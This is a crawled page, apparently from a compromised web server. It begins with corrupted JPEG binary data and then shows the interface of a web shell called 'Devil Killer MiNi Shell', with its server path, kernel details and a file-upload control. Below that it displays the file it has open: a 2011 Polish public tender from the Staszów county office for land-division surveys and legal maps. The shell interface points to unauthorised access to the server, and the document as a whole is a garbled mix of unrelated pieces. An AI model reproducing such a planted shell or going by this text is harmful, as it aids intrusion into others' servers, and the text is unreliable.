JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111012/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111012/267831-N-2011.html

<p class="kh_header"><b>Staszów: Wykonanie projektów podziału nieruchomości i map do celów prawnych.</b><br>
<b>Numer ogłoszenia: 267831 - 2011; data zamieszczenia: 12.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Staszowski - Starostwo Powiatowe , ul. Świerczewskiego 7, 28-200 Staszów, woj. świętokrzyskie, tel. 015 8642765, faks 015 8642211.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.staszowski.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie projektów podziału nieruchomości i map do celów prawnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie projektów podziału nieruchomości i map do celów prawnych realizowanych w 7 zadaniach:
Zadanie 1 
Wykonanie projektów podziału działek w celu wydzielenia części zajętej pod drogę publiczną.
Przedmiotem zamówienia jest wykonanie:
1.	projektu podziału działek położonej w obrębie Suchowola, gm. Osiek w celu wydzielenia części zajętej pod drogę publiczną Nr 0795T pod nazwą Osiek - Suchowola oznaczonych 
w ewidencji gruntów numerami:
       2598/2 o pow. 0,3900 ha, 2598/1 o pow. 0,3700 ha, 2597/2 o pow. 0,3100 ha, 2597/4 o pow. 0,2300 ha, 2597/3 o pow. 0,1300 ha, 2596 o pow. 0,7000 ha, 2595/1 o pow. 0,5600 ha, 2595/2 o pow. 0,5000 ha, 2594 o pow. 0,3700 ha, 2593 o pow. 0,8400 ha, 2591 o pow. 0,7500 ha, 2590 o pow. 0,8400 ha, 2589/1 o pow. 0,1700 ha, 2589/2 
o pow. 0,6900 ha, 2588 o pow. 0,7800 ha, 2587 o pow. 0,7100 ha, 2586 o pow. 0,3200 ha, 2585 o pow. 0,2900 ha, 2584 o pow. 0,4600 ha, 2583 o pow. 0,4900 ha, 2582/1 
o pow. 0,2800 ha, 2581/1 o pow. 0,2800 ha, 2580 o pow. 0,6000 ha, 2579 o pow. 0,6600 ha, 2578/2 o pow. 0,3300 ha, 2578/1 o pow. 0,3200 ha, 2577 o pow. 0,6500 ha, 2576 o pow. 0,6400 ha, 2575/2 o pow. 0,3200 ha, 2575/1 o pow. 0,3400 ha, 2574 
o pow. 0,6400 ha, 2573/2 o pow. 0,3100 ha, 2573/1 o pow. 0,3000 ha, 2572 o pow. 0,6900 ha, 2571/1 o pow. 0,6400 ha, 2571/2 o pow. 0,0800 ha, 2570 o pow. 0,5100 ha, 2569 o pow. 0,4300 ha,  2568 o pow. 0,9600 ha, 3141 o pow. 0,4700 ha, 2567 o pow. 0,5000 ha, 2566 
o pow. 0,9500 ha, 2565 o pow. 0,7100 ha, 2564/1 o pow. 0,5700 ha, 2562/1 o pow. 0,5500 ha, 2561 o pow. 0,8700 ha, 2560 o pow. 0,8400 ha, 901/2 o pow. 0,4800 ha, 901/1 o pow. 0,4100 ha, 902 o pow. 0,7600 ha, 903 o pow. 0,7600 ha, 904/1 o pow. 0,4433 ha,  904/2 
o pow. 0,1867 ha, 905 o pow. 0,4800 ha, 906 o pow. 0,5200 ha, 909 o pow. 0,0600 ha, 910 
o pow. 0,0500 ha, 793 o pow. 0,0600 ha, 911 o pow. 0,0800 ha, 912 o pow. 0,0800 ha, 913 
o pow. 0,0800 ha, 914 o pow. 0,0700 ha, 915 o pow. 0,0700 ha, 916 o pow. 0,0300 ha, 917 
o pow. 0,0300 ha, 918 o pow. 0,0700 ha, 919 o pow. 0,0600 ha, 920 o pow. 0,0600 ha, 921 
o pow. 0,0400 ha, 922 o pow. 0,0200 ha, 1069 o pow. 0,1000 ha, 1070 o pow. 0,0700 ha, 1071 o pow. 0,0600 ha, 1072 o pow. 0,0600 ha, 1073 o pow. 0,1000 ha, 1074 o pow. 0,1400 ha, 1075 o pow. 0,1600 ha, 1076 o pow. 0,1200 ha, 1077 o pow. 0,1000 ha, 1078 
o pow. 0,0600 ha, 1079 o pow. 0,0200 ha, 1080/1 o pow. 0,5000 ha, 1080/2 o pow. 0,5100 ha, 1081 o pow. 0,2700 ha, 1082 o pow. 0,2900 ha, 1083 o pow. 0,5900 ha, 1084/1 o pow. 0,1600 ha, 1085/1 o pow. 0,2300 ha, 1086/1 o pow. 0,0700 ha, 1088/1 o pow. 0,0700 ha, 3151/2 o pow. 0,1900 ha, 1165/2 o pow. 0,4000 ha, 1164/2 o pow. 0,2000 ha, 1163/2 o pow. 0,4100 ha, 1162/2 o pow. 0,2100 ha, 1161/2 o pow. 0,7500 ha, 1160/2 o pow. 0,3900 ha, 1159/2 o pow. 0,4200 ha, 1158/5 o pow. 0,8200 ha, 1158/4 o pow. 0,9800 ha, 1153/2 o pow. 0,0500 ha, 1152/2 o pow. 0,1600 ha, 1151/2 o pow. 0,2900 ha, 1150/2 o pow. 0,3600 ha, 1149/2 o pow. 0,4100 ha, 1148/2 o pow. 0,4300 ha, 1147/2 o pow. 0,4700 ha, 1146/2 o pow. 0,4900 ha, 1145/2 o pow. 0,5600 ha, 1144/2 o pow. 0,5600 ha, 1143/2 o pow. 0,5200 ha, 1142/2 o pow. 0,6000 ha, 1141/2 o pow. 0,7100 ha, 1140/2 o pow. 0,7100 ha, 1139/2 o pow. 0,7800 ha, 1138/2 o pow. 0,7400 ha, 1137 o pow. 0,3900 ha, 1136 o pow. 0,3800 ha, 1135 
o pow. 0,8200 ha, 1134 o pow. 0,7600 ha, 1133 o pow. 0,7900 ha, 1132 o pow. 0,8300 ha, 1131 o pow. 0,9000 ha, 1130 o pow. 0,8500 ha,  3134 o pow. 0,7700 ha, 1126/2 o pow. 0,9800 ha, 1126/1 o pow. 0,4000 ha, 1123 o pow. 1,2500 ha, 1121 o pow. 2,5600 ha, 1120 
o pow. 2,1900 ha, 1119/1 o pow. 1,1300 ha, 1119/2 o pow. 1,1500 ha, 2540
o pow. 2,2700 ha, 2541/1 o pow. 1,4100 ha, 2543/1 o pow. 1,4000 ha, 2544 o pow. 1,6100 ha, 3142 o pow. 0,9200 ha, 2547 o pow. 1,8500 ha, 2548 o pow. 0,8900 ha, 2549 o pow. 0,8800 ha, 2550 o pow. 1,5400 ha, 2551 o pow. 1,5400 ha, 2552/1 o pow. 0,6700 ha, 2552/2 o pow. 0,6200 ha, 2553 o pow. 1,0900 ha, 2554/1 o pow. 0,4500 ha, 2554/2 o pow.0,4500 ha, 2555 o pow. 0,8300 ha, 2556/1 o pow. 0,3958 ha, 2556/2 o pow. 0,3362 ha, 2557/1 
o pow. 0,3100 ha, 2557/2 o pow. 0,2700 ha, 2558 o pow. 0,3500 ha, 2559 o pow. 0,1000 ha, 2521/1 o pow. 1,8900 ha, 2522/1 o pow. 1,9000 ha, 2523 o pow. 3,8400 ha, 2525 o pow. 1,9300 ha, 2526 o pow. 1,8800 ha, 2527 o pow. 3,6200 ha, 2528 o pow. 3,6300 ha, 2529 
o pow. 3,5100 ha,  2530 o pow. 3,5400 ha, 2531 o pow. 3,6500 ha, 2533 o pow. 3,6600 ha, 2534 o pow. 1,6200 ha, 2535/1 o pow. 2,7000 ha, 2535/2 o pow. 2,7600 ha, 2536 o pow. 3,3600 ha, 2537/3 o pow. 0,1300 ha, 2537/4 o pow. 1,6200 ha, 2537/2 o pow. 1,8100 ha, 2538/1 o pow. 1,9300 ha, 2538/2 o pow. 1,9100 ha, 849/2 o pow. 3,1100 ha
z wykazami zmian gruntowych oraz zastabilizowanie punktów granicznych znakami granicznymi.
Mapa z projektem podziału nieruchomości powinna być również mapą do celów prawnych, dokumentującą fakt zajęcia nieruchomości pod drogę w dniu 31.12.1998 r. 
z adnotacją, że granice pasa drogowego i granice nieruchomości zostały ustalone według stanu istniejącego w tej dacie oraz należy powołać art. 73 ustawy z dnia 13 października 1998 r. - Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. Nr 133, poz. 872 ze zm.) jako podstawę prawną do dokonania podziału bez konieczności wydawania decyzji zatwierdzającej podział.
Zadanie 2
Wykonanie projektów podziału działek w celu wydzielenia części zajętych pod drogi publiczne.
Przedmiotem zamówienia jest :
-  wykonanie projektu podziału działki położonej w Suchowoli, gm. Osiek, oznaczonej numerem 3153/11 o pow. 0,4369 ha w celu wydzielenia części zajętych pod pas drogi publicznej 
Nr 42319 (nowy Nr 0795 T) pn.  Osiek - Suchowola,
-  wykonanie projektu podziału działki położonej w Suchowoli, gm. Osiek, oznaczonej numerem     2599 o pow. 0,8500 ha w celu wydzielenia części zajętych pod pas drogi publicznej Nr 42319    (nowy Nr 0795 T) pn. Osiek - Suchowola,
- wykonanie projektu podziału działki położonej w Pliskowoli, gm. Osiek, oznaczonej numerem    2405/2 o pow. 0,1186 ha w celu wydzielenia części zajętych pod pas drogi publicznej 
   Nr 42340 (nowy Nr 0812 T) pn.  od drogi 765 - Pliskowola - Osiek,
- wykonanie projektu podziału działki położonej w Pliskowoli, gm. Osiek, oznaczonej numerem    2405/13 o pow. 0,8632 ha w celu wydzielenia części zajętych pod pas drogi publicznej Nr 765    pn. Jędrzejów - Kije -Chmielnik-Staszów. 
z wykazami zmian gruntowych oraz zastabilizowanie punktów granicznych znakami granicznymi.
Mapa z projektem podziału nieruchomości powinna być również mapą do celów prawnych, dokumentującą fakt zajęcia nieruchomości pod drogę w dniu 31.12.1998 r. z adnotacją, że granice pasa drogowego i granice nieruchomości zostały ustalone według stanu istniejącego 
w tej dacie oraz należy powołać art. 73 ustawy z dnia 13 października 1998 r. - Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. Nr 133, poz. 872 ze zm.) jako podstawę prawną do dokonania podziału bez konieczności wydawania decyzji zatwierdzającej podział.
Zadanie 3 
Wykonanie projektów podziału działek w celu wydzielenia gruntu przeznaczonego do zwrotu.
Przedmiotem zamówienia jest wykonanie opracowania geodezyjnego, którego przedmiotem jest wykonanie projektu podziału działek położonych w Kielcach, oznaczonych w ewidencji gruntów obr. 0024 numerami: 1109/10 o pow. 0,0167 ha i 1109/11 o pow. 0,0383 ha w celu wydzielenia gruntu wywłaszczonego o pow. 90 m2 wraz  z rejestrem synchronizacyjnym, w tym:
       a) zawiadomienie wnioskodawców o terminie przyjęcia przebiegu granic nieruchomości 
             w związku z jej podziałem,
       b)  zastabilizowanie punktów granicznych znakami granicznymi
Opracowanie geodezyjne zleca się na potrzeby postępowania prowadzonego w trybie art. 136 ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami w sprawie zwrotu nieruchomości wywłaszczonej.
Zadanie 4
Wykonanie dokumentacji do celów prawnych dla działek położonych w Staszowie. 
Wykonanie dokumentacji geodezyjnej do celów prawnych dla działek położonych w Staszowie, oznaczonych numerami: 
-	3626 o pow. 0,0991 ha, 
-	6053/2 o pow. 0,5689 ha,
-	6053/5 o pow. 0,0594 ha,
-	6053/6 o pow. 0,5765 ha, 
-	6055/1 o pow. 0,0123 ha, 
-	6055/4 o pow. 0,0824 ha,
-	6055/5 o pow. 0,0118 ha, 
-	6056 o pow. 0,1214 ha,
-	6057 o pow. 0,0791 ha, 
-	6060/1 o pow. 0,6571 ha,
-	6060/2 o pow. 0,0162 ha,
-	6070 o pow. 0,2864 ha, 
z którego wynikać będzie czy działki wywodzą się z nieruchomości ujawnionej w księdze wieczystej 378.

Zadanie 5
Wykonanie dokumentacji do celów prawnych dla działek położonych w Staszowie. Wykonanie dokumentacji do celów prawnych dla działek położonych w Staszowie oznaczonych numerami 6075/2 o pow. 0,0179 ha, 6075/3 o pow. 0,0121 ha, z której wynikać będzie jaka część tych działek wywodzi się z działki oznaczonej przed modernizacją ewidencji gruntów numerem 3556.
Zadanie 6
Wykonanie dokumentacji do celów prawnych dla działki położonej w obrębie Sztombergi gm. Staszów. 
Wykonanie mapy do celów prawnych ustalającej aktualny numer ewidencyjny nieruchomości, która została oznaczona w tabeli likwidacyjnej wsi Dobra jako zagroda chłopska nr 3 oraz ustalającej aktualne numery ewidencyjne nieruchomości, które na podstawie ww. tabeli likwidacyjnej i dołączonej do niej mapy oddane zostały do wspólnego użytkowania jako wspólne pastwiska i inne serwituty. 
Zadanie 7
Wykonanie dokumentacji do celów prawnych dla działek położonych w Rytwianach. 
Wykonanie mapy do celów prawnych dla nieruchomości położonej na terenie gminy Rytwiany 
w obrębie Rytwiany, oznaczonej numerami 1351/4 o pow. 0,2300 ha i 1415/3 o pow. 2,1900 ha, wywodzących się z dawnej księgi wieczystej KW Nr Las Podklasztor..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 23.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zmawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jeżeli Wykonawca   wykaże, że dysponuje osobami zdolnymi do wykonania   zamówienia: - co najmniej jedną osobą posiadającą uprawnienia zawodowe  w zakresach, o których mowa w art. 43 pkt 1 i 2 ustawy z dnia 17 maja 1989 r. Prawo geodezyjne i kartograficzne
Dz. U z 2005 r. nr 240, poz. 2027 ze zm. Na potwierdzenie spełniania tego warunku wykonawcy złożą określone  w ogłoszeniu i SIWZ oświadczenia lub dokumenty. 
 Warunek będzie oceniany na podstawie złożonych dokumentów uwzględniając zapisy 
 art. 26 ust 3 ustawy Pzp wg kryteriów spełnia lub nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)   formularz oferty wg  załącznika Nr 1 do SIWZ,
b)   pełnomocnictwo, określające jego zakres w przypadku, gdy Wykonawcę reprezentuje             pełnomocnik (jeżeli dotyczy), 
c) pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia            publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie             zamówienia publicznego wykonawców występujących wspólnie w przypadku       wspólnego ubiegania się o udzielenie  niniejszego zamówienia (jeżeli dotyczy).
Każdy z wykonawców występujących wspólnie musi złożyć oddzielnie dokument wskazane w pkt XII. ppkt 6. b) SIWZ. 
Każdy z wykonawców występujących wspólnie musi złożyć łącznie dokumenty wskazane w pkt XII. ppkt 6. a), 6. c)  SIWZ.
Jeżeli Wykonawca polega na  wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia innych podmiotów, składa wraz z ofertą pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Wykonawcy występujący wspólnie.
Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.
W przypadku składania oferty przez wykonawców występujących wspólnie, wykonawcy ustanowią pełnomocnika do reprezentowania ich w postępowaniu 
o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy 
w sprawie zamówienia publicznego. Pełnomocnictwo może być przedłożone wyłącznie w formie oryginału lub kopii poświadczonej przez notariusza.
Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia. 
Jeżeli oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia została wybrana zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych wykonawców.
Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za wykonanie  umowy. Każdy oddzielnie z Wykonawców występujących wspólnie nie może podlegać wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 Pzp, a także musi spełniać wymogi, o których mowa w pkt. XI SIWZ, a ich wiedza, doświadczenie, potencjał techniczny i osoby zdolne do wykonania zamówienia oraz sytuacja finansowa oceniane będą łącznie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dla zadania nr 1 i 2:
1.	Wprowadzenie zmian treści umowy wymaga formy pisemnej pod rygorem nieważności. Potrzeba wprowadzenia zmian może wynikać z następujących okoliczności:
1) zmian regulacji prawnych obowiązujących w dniu podpisania umowy,
2)  gdy zmianie ulegnie numer konta bankowego Wykonawcy
3) w sytuacji wyrażenia przez Zamawiającego zgody na przedłużenie terminu wykonania    
     zamówienia na skutek zaistnienia okoliczności niezawinionych przez Wykonawcę,
4) innych, których nie można było przewidzieć w chwili zawarcia umowy.
2.	Zmiany treści umowy dopuszczone w ust. 1 nie mogą prowadzić do zwiększenia wynagrodzenia. 
Dla zadania nr 3:
1.	Wprowadzenie zmian treści umowy wymaga formy pisemnej pod rygorem nieważności. Potrzeba wprowadzenia zmian może wynikać z następujących okoliczności:
1) zmian regulacji prawnych obowiązujących w dniu podpisania umowy,
2)  gdy zmianie ulegnie numer konta bankowego Wykonawcy
3)  w sytuacji wyrażenia przez Zamawiającego zgody na przedłużenie terminu      wykonania    
     zamówienia na skutek zaistnienia okoliczności niezawinionych przez Wykonawcę,
    4) w sytuacji zmiany zakresu żądania wnioskodawców albo jeżeli w wyniku pomiarów geodezyjnych ustalone zostanie, że w granicach nieruchomości wywłaszczonej 
w całości zawierają się działki wskazane do podziału, Zamawiający zmniejszy zakres rzeczowy zamówienia o tę część i zmniejszeniu ulegnie wynagrodzenie Wykonawcy w części odpowiadającej zmniejszonemu zakresowi zamówienia,
5) zmiany ustawowej stawki podatku VAT,
6) innych, których nie można było przewidzieć w chwili zawarcia umowy.
2.	Zmiany treści umowy dopuszczone w ust. 1 nie mogą prowadzić do zwiększenia wynagrodzenia, z zastrzeżeniem dopuszczalności zmiany wysokości wynagrodzenia wynikającej ze zmiany ustawowej stawki podatku VAT.
Dla zadania nr: 4, 5, 6, 7: 
1.	Wprowadzenie zmian treści umowy wymaga formy pisemnej pod rygorem nieważności. Potrzeba wprowadzenia zmian może wynikać z następujących okoliczności:
1) zmian regulacji prawnych obowiązujących w dniu podpisania umowy,
2)  gdy zmianie ulegnie numer konta bankowego Wykonawcy
3)  w sytuacji wyrażenia przez Zamawiającego zgody na przedłużenie terminu       wykonania zamówienia na skutek zaistnienia okoliczności niezawinionych przez      Wykonawcę,
4) zmiany ustawowej stawki podatku VAT,
5) innych, których nie można było przewidzieć w chwili zawarcia umowy.
2.	Zmiany treści umowy dopuszczone w ust. 1 nie mogą prowadzić do zwiększenia wynagrodzenia, z zastrzeżeniem dopuszczalności zmiany wysokości wynagrodzenia wynikającej ze zmiany ustawowej stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
